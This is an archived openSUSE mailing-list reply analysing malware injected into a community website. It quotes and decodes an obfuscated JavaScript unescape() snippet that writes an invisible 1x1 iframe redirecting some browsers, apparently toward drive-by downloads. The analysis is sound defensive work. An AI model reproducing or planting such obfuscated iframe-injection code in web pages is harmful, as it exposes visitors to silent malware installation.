Mailinglist Archive: opensuse-project (465 mails)

< Previous Next >
Re: [opensuse-project] is a bad website
  • From: David Haller <dnh@xxxxxxxxxxxx>
  • Date: Fri, 2 Jul 2010 01:06:06 +0200
  • Message-id: <20100701230606.GA7231@xxxxxxxxxxxxxxxxxx>

On Thu, 01 Jul 2010, Marcus Meissner wrote:
On Thu, Jul 01, 2010 at 06:35:44PM +0200, Cristian Morales Vega wrote:
2010/7/1 Andrea Florio <andrea@xxxxxxxxxxxx>:
Hash: SHA1

According to firefox/google, is a bad website...
anything we can do??

The FAQ explains how it works:

But it's my understanding that it has already been reported:


The very first line looks truly like malware:

script language=JavaScript document.write(unescape('%3c'+'%73cri%70t
%62%256f'+'%2572d%256'+'5r=%27+%270 %256%36%72amebo%2572'+'der%253%640

So it seems at a deeper look.

$ jsshell
js> unescape('%3c'+'%73cri%70t
%62%256f'+'%2572d%256'+'5r=%27+%270 %256%36%72amebo%2572'+'der%253%640
he%69g'+'ht%3d1 b%6f%72d%65r='+'0 %66ramebo%72der%3d0
js> unescape('%3ciframe%20w'+'i%64'+'th=1 he%69g'+'ht%3d1 b%6f%72d%65r='+'0
<iframe width=1 height=1 border=0 frameborder=0

So, it "injects" an "invisible" 1x1 iframe. The weird stuff is: redirects to, if you
call it as a linux browser.

But if you call it as e.g. an ie6, you get redirected to

So, I guess depending on which browser you use (and whatever else) you
could get redirected to a site where malware is, trying to be
installed as drive-by-download or whatever.

Anyway, JavaScript unescape orgies are always a bad sign. Please, tell
the admins to reinstall from a clean source / backups. And webpin's
index has been broken for quite a while anyway.


PS: jsshell is part of libjs, no idea if oS/packman package it.

[Stefan Wegmann sucht ein optisch ansprechendes Brennprogramm] Hhhhmmm, unter
diesem Aspekt habe ich das ganze noch gar nicht betrachtet. Was würde denn
Deinen gehobenen ästhetischen Ansprüchen entgegenkommen? Ein zartes Chartreuse
im leicht fluffigen Kontrast zu einem frühlingshaften Ostereidottergelb? Mit
Buttons im floralen Design und Chiffoneske Hilfsfenster mit einer luftig
durchscheinenden Optik? [Thomas Templin in suse-linux]
To unsubscribe, e-mail: opensuse-project+unsubscribe@xxxxxxxxxxxx
For additional commands, e-mail: opensuse-project+help@xxxxxxxxxxxx

< Previous Next >